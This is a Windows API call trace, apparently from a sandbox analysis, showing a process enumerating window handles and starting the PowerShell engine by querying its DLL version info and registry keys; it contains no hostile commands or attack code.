	[0471.340] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x158c
	[0471.340] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1588
	[0471.340] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1584
	[0471.340] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1580
	[0471.340] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x157c
	[0471.340] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1488
	[0471.340] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1404
	[0471.341] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x11b8
	[0471.341] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xbd4
	[0471.341] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe0c
	[0471.341] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xd30
	[0471.341] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe70
	[0471.341] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x13b8
	[0471.342] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe20
	[0471.342] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe2c
	[0471.342] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe00
	[0471.342] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe04
	[0471.342] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc94
	[0471.342] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x13b0
	[0471.342] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x13ac
	[0471.342] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x13a8
	[0471.342] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1374
	[0471.343] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x132c
	[0471.343] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1328
	[0471.343] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x12d0
	[0471.343] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x12cc
	[0471.343] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x12c8
	[0471.343] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1290
	[0471.343] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1218
	[0471.343] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1214
	[0471.343] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x11ec
	[0471.344] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x11e8
	[0471.344] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x11cc
	[0471.344] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1140
	[0471.344] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe6c
	[0471.344] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x6e8
	[0471.344] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc6c
	[0471.344] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xf94
	[0471.344] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xffc
	[0471.345] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xf74
	[0471.345] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xf08
	[0471.345] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xf0c
	[0471.345] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xed8
	[0471.345] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe90
	[0471.345] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xea8
	[0471.345] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xfa8
	[0471.345] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xfbc
	[0471.345] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xfb8
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xfb4
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xfb0
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xfac
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xfc0
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xfd0
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xf88
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xf84
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xf80
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xde0
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xddc
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xdd8
	[0471.346] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xd34
	[0471.347] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xd10
	[0471.347] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xd0c
	[0471.347] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc9c
	[0471.347] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc74
	[0471.347] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc1c
	[0471.347] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc08
	[0471.347] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xabc
	[0471.347] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x24c
	[0471.347] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xbb0
	[0471.347] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xbfc
	[0471.347] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb10
	[0471.348] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x374
	[0471.348] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x368
	[0471.348] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb28
	[0471.348] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xae8
	[0471.348] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb14
	[0471.348] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x95c
	[0471.348] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa8c
	[0471.348] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x46c
	[0471.348] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb3c
	[0471.348] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa90
	[0471.348] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xad0
	[0471.349] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa9c
	[0471.349] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xaa0
	[0471.349] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb1c
	[0471.349] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x7e0
	[0471.349] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa74
	[0471.349] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x694
	[0471.349] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa28
	[0471.349] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x9b0
	[0471.349] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x8d8
	[0471.349] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x940
	[0471.349] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x93c
	[0471.350] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4ec
	[0471.350] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x150
	[0471.350] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x720
	[0471.350] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x3c4
	[0471.350] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x7d4
	[0471.350] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x6c8
	[0471.350] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb54
	[0471.350] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb54
	[0471.350] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb5c
	[0471.350] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x838
	[0471.350] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x818
	[0471.351] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x5b8
	[0471.351] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x494
	[0471.351] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1ec
	[0471.351] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x440
	[0471.351] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x7e8
	[0471.351] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x730
	[0471.351] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x2c8
	[0471.351] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x31c
	[0471.351] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x330
	[0471.355] WerSetFlags () returned 0x0
	[0472.767] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0472.768] CoTaskMemFree (pv=0x0) 
	[0472.768] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xadfc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xadfc0 | out: pulNumLanguages=0xadfc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xadfc0) returned 1
	[0472.769] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xadfc8, pwszLanguagesBuffer=0x2ca1ef0, pcchLanguagesBuffer=0xadfc0 | out: pulNumLanguages=0xadfc8, pwszLanguagesBuffer=0x2ca1ef0, pcchLanguagesBuffer=0xadfc0) returned 1
	[0472.774] CoTaskMemAlloc (cb=0x24) returned 0x22d420
	[0472.774] GetUserDefaultLocaleName (in: lpLocaleName=0x22d420, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0472.774] CoTaskMemFree (pv=0x22d420) 
	[0474.001] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0474.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.001] CoTaskMemFree (pv=0x19ae70) 
	[0474.003] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0474.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.003] CoTaskMemFree (pv=0x19ae70) 
	[0474.005] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0474.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.005] CoTaskMemFree (pv=0x19ae70) 
	[0474.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.016] SetErrorMode (uMode=0x1) returned 0x1
	[0474.016] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xadc40 | out: lpFileInformation=0xadc40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0474.017] SetErrorMode (uMode=0x1) returned 0x1
	[0474.017] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xadeb0 | out: lpdwHandle=0xadeb0) returned 0x94c
	[0474.018] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ca5780 | out: lpData=0x2ca5780) returned 1
	[0474.019] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xade28, puLen=0xade20 | out: lplpBuffer=0xade28*=0x2ca581c, puLen=0xade20) returned 1
	[0474.019] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x2ca58f8, puLen=0xadd90) returned 1
	[0474.019] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0474.019] CoTaskMemAlloc (cb=0x2e) returned 0x22f840
	[0474.019] lstrcpyW (in: lpString1=0x22f840, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0474.019] CoTaskMemFree (pv=0x22f840) 
	[0474.019] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x2ca594c, puLen=0xadd90) returned 1
	[0474.019] lstrlenW (lpString="System.Management.Automation") returned 28
	[0474.019] CoTaskMemAlloc (cb=0x3c) returned 0x236860
	[0474.019] lstrcpyW (in: lpString1=0x236860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0474.019] CoTaskMemFree (pv=0x236860) 
	[0474.019] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x2ca59a8, puLen=0xadd90) returned 1
	[0474.020] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0474.020] CoTaskMemAlloc (cb=0x20) returned 0x233540
	[0474.020] lstrcpyW (in: lpString1=0x233540, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0474.020] CoTaskMemFree (pv=0x233540) 
	[0474.020] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x2ca59e8, puLen=0xadd90) returned 1
	[0474.020] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0474.020] CoTaskMemAlloc (cb=0x44) returned 0x236860
	[0474.020] lstrcpyW (in: lpString1=0x236860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0474.020] CoTaskMemFree (pv=0x236860) 
	[0474.020] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x2ca5a50, puLen=0xadd90) returned 1
	[0474.020] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0474.020] CoTaskMemAlloc (cb=0x76) returned 0x1df9a0
	[0474.020] lstrcpyW (in: lpString1=0x1df9a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0474.020] CoTaskMemFree (pv=0x1df9a0) 
	[0474.020] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x2ca5aec, puLen=0xadd90) returned 1
	[0474.020] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0474.020] CoTaskMemAlloc (cb=0x44) returned 0x236860
	[0474.020] lstrcpyW (in: lpString1=0x236860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0474.020] CoTaskMemFree (pv=0x236860) 
	[0474.020] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x2ca5b50, puLen=0xadd90) returned 1
	[0474.020] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0474.020] CoTaskMemAlloc (cb=0x58) returned 0x198c40
	[0474.020] lstrcpyW (in: lpString1=0x198c40, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0474.021] CoTaskMemFree (pv=0x198c40) 
	[0474.021] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x2ca5bcc, puLen=0xadd90) returned 1
	[0474.021] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0474.021] CoTaskMemAlloc (cb=0x20) returned 0x233540
	[0474.021] lstrcpyW (in: lpString1=0x233540, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0474.021] CoTaskMemFree (pv=0x233540) 
	[0474.021] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x2ca5874, puLen=0xadd90) returned 1
	[0474.021] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0474.021] CoTaskMemAlloc (cb=0x66) returned 0x227f40
	[0474.021] lstrcpyW (in: lpString1=0x227f40, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0474.021] CoTaskMemFree (pv=0x227f40) 
	[0474.021] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x0, puLen=0xadd90) returned 0
	[0474.021] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x0, puLen=0xadd90) returned 0
	[0474.021] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xadd98, puLen=0xadd90 | out: lplpBuffer=0xadd98*=0x0, puLen=0xadd90) returned 0
	[0474.021] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xadd68, puLen=0xadd60 | out: lplpBuffer=0xadd68*=0x2ca581c, puLen=0xadd60) returned 1
	[0474.021] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0474.021] VerLanguageNameW (in: wLang=0x0, szLang=0x1e2120, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0474.021] CoTaskMemFree (pv=0x1e2120) 
	[0474.021] VerQueryValueW (in: pBlock=0x2ca5780, lpSubBlock="\\", lplpBuffer=0xaddb8, puLen=0xaddb0 | out: lplpBuffer=0xaddb8*=0x2ca57a8, puLen=0xaddb0) returned 1
	[0474.030] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0474.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.030] CoTaskMemFree (pv=0x19ae70) 
	[0474.035] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0474.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.035] CoTaskMemFree (pv=0x19ae70) 
	[0474.040] lstrlenW (lpString="䅁") returned 1
	[0474.953] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xadc88 | out: phkResult=0xadc88*=0x2f8) returned 0x0
	[0474.955] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xadc78 | out: phkResult=0xadc78*=0x2fc) returned 0x0
	[0474.955] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xadd08 | out: phkResult=0xadd08*=0x300) returned 0x0
